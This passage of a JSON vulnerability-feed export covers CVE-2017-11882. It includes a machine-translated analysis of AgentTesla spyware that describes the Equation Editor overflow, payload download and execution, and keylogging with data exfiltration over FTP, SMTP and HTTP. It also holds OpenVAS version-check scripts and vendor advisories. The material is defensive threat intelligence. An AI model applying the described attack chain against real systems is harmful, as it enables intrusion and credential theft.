"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-03-20T19:14:15", "type": "carbonblack", "title": "TAU Threat Intelligence Notification: NanoCore \u2013 Old Malware, New Tricks!", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-20T19:14:15", "id": "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "href": "https://www.carbonblack.com/2019/03/20/tau-threat-intelligence-notification-nanocore-old-malware-new-tricks/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-05-28T03:24:00", "description": "Background overview \nAgentTesla was originally a released in 2014 the simple key loggers, and in recent years its development team which constantly adds many new features, and sale. AgentTesla has now become a commercial spyware that can be controlled by the end of the generation to meet the functional requirements of a Trojan. \nAgentTesla the most common mode of transmission is phishing mail, mail attachments often carry a malicious document, by a macro or an exploit to download and run a malicious program. Recently, Sangfor security team collected to make use of CVE-2017-11882 spread AgentTesla steal the information of the malicious samples, and its attack process carried out a detailed analysis. \nA detailed analysis of the \nCVE-2017-11882 \n1. Use tools to monitor file behavior, see to run the document after the system pulled up the eqnedt32. exe process, and by the capture capture to download the EXE file of the flow, whereby the determination is the use of CVE-2017-11882 execute malicious code: a \n! [](/Article/UploadPic/2019-5/201952872350787. png) \n2. By attaching a debugger, the in Kernel32! WinExec next breakpoint, view register values, find the run.\"C:\\Users\\root\\AppData\\Roaming\\Adobe.exe\"the command, and capture the flow of information combined with the judgment, the malicious code should is download save the file to local and then run inference using the URLDownloadToFile related API: \n! [](/Article/UploadPic/2019-5/201952872351853. png) \n3. Attach the debugger to the network related APIS of the lower-off debugging, but the program did not break down, so in the eqnedt32. exe caused an overflow of the function at the lower off, stepping to the ret overwrite the return address to execute malicious code: a \n! [](/Article/UploadPic/2019-5/201952872353745. png) \n4. Malicious code in the first memory to decrypt the operation, the figure is a decryption of a before and after comparison, you can visually see the string information through a dynamic access to the API address to call URLDownloadToFileW download the file, and then through WinExec to run: \n! [](/Article/UploadPic/2019-5/201952872354449. png) \n! [](/Article/UploadPic/2019-5/201952872356708. png) \nAgentTesla \n1\\. AgentTesla is used. Net framework to write a keyboard logger, use the decompile tool to view the code, custom function names are confusing, but the use of the API and the keyword string is still plain text, you can see the keystroke recording code: \n! [](/Article/UploadPic/2019-5/201952872358476. png) \n2. In addition to the Keylogger, it also will by reading the registry key value to obtain the host information: \n! [](/Article/UploadPic/2019-5/201952872359416. png) \n3. Use the DES algorithm to encrypt the data to be sent to: \n! [](/Article/UploadPic/2019-5/20195287240111. png) \n4. There are three alternative ways the stolen data is uploaded to the remote C&amp;C end: \nVia FTP upload: \n! [](/Article/UploadPic/2019-5/20195287241828. png) \nVia SMTP upload: \n! [](/Article/UploadPic/2019-5/20195287242974. png) \nBy HTTP upload: \n! [](/Article/UploadPic/2019-5/20195287243766. png) \n5\\. AgentTesla the resources embedded in a DLL file \u540d\u4e3aIELibrary.dll that is used to implement a browser operation of the DLL file, in AgentTesla defines the need to steal information browser and network kit name, this is in the use of the control terminal generates malicious programs optional: \n! [](/Article/UploadPic/2019-5/20195287244718. png) \n6\\. IELibrary. dll is mainly for the browser for information collection and operation, including the history of additions and deletions to check: \n! [](/Article/UploadPic/2019-5/20195287244281. png) \nSteal passwords and cookies: \n! [](/Article/UploadPic/2019-5/20195287245577. png) \nSolutions \nVirus defense \n1, not from unknown website to download the software, do not click on unknown sources of e-mail attachments, involuntary macro-enabled; and \n2, download patch patch CVE-2017-11882: the \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 \n3, open the Windows Update features regularly to the system for automatic updates; \n4, the Sangfor firewall customers recommended to upgrade to AF805 version, and turn on the artificial intelligence engine to Save, in order to achieve the best defense results; \nFinally, the recommendations of the enterprise on the whole network once the security check and antivirus scan, to strengthen the protection work. \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-28T00:00:00", "title": "Wary of the use of the Office vulnerabilities to spread commercial spyware AgentTesla-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2019-05-28T00:00:00", "id": "MYHACK58:62201994299", "href": "http://www.myhack58.com/Article/html/3/62/2019/94299.htm", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB3162047", "cvss3": {}, "published": "2017-11-15T00:00:00", "type": "openvas", "title": "Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812083", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812083\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11882\");\n script_bugtraq_id(101757);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:01:17 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3162047)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3162047\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when the software fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited the vulnerability to run arbitrary code in the context\n of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3162047\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noffVer = get_kb_item(\"MS/Office/Ver\");\nif(!offVer || offVer !~ \"^15\\.\"){\n exit(0);\n}\n\nmsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(msPath)\n{\n offPath = msPath + \"\\Microsoft Shared\\EQUATION\" ;\n msdllVer = fetch_file_version(sysPath:offPath, file_name:\"eqnedt32.exe\");\n if(!msdllVer){\n exit(0);\n }\n\n if(version_is_less(version:msdllVer, test_version:\"2017.8.14.0\"))\n {\n report = report_fixed_ver( file_checked:offPath + \"\\eqnedt32.exe\",\n file_version:msdllVer, vulnerable_range:\"Less than 2017.8.14.0\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing an important security\n update according to Microsoft KB4011276", "cvss3": {}, "published": "2017-11-15T00:00:00", "type": "openvas", "title": "Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812148\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11882\");\n script_bugtraq_id(101757);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 13:22:30 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB4011276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4011276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the software fails\n to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2007 Service Pack 3.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4011276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\noffVer = get_kb_item(\"MS/Office/Ver\");\nif(!offVer || offVer !~ \"^12\\.\"){\n exit(0);\n}\n\nmsPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(msPath)\n{\n offPath = msPath + \"\\Microsoft Shared\\EQUATION\" ;\n msdllVer = fetch_file_version(sysPath:offPath, file_name:\"eqnedt32.exe\");\n if(!msdllVer){\n exit(0);\n }\n\n if(version_is_less(version:msdllVer, test_version:\"2017.8.14.0\"))\n {\n report = report_fixed_ver( file_checked:offPath + \"\\eqnedt32.exe\",\n file_version:msdllVer, vulnerable_range:\"Less than 2017.8.14.0\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:41:39", "description": "A remote code execution vulnerability exists in Microsoft Office Equation Editor. The vulnerability is due to an error in the way Microsoft Office improperly handles objects in memory while parsing specially crafted files. A remote attacker can exploit this issue by enticing a victim to open a specially crafted file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Office Memory Corruption Remote Code Execution (CVE-2017-11882)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2018-10-29T00:00:00", "id": "CPAI-2017-1009", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:21", "description": "A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe security update addresses the vulnerability by correcting how the affected Office component handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-14T08:00:00", "type": "mscve", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-29T08:00:00", "id": "MS:CVE-2017-11882", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}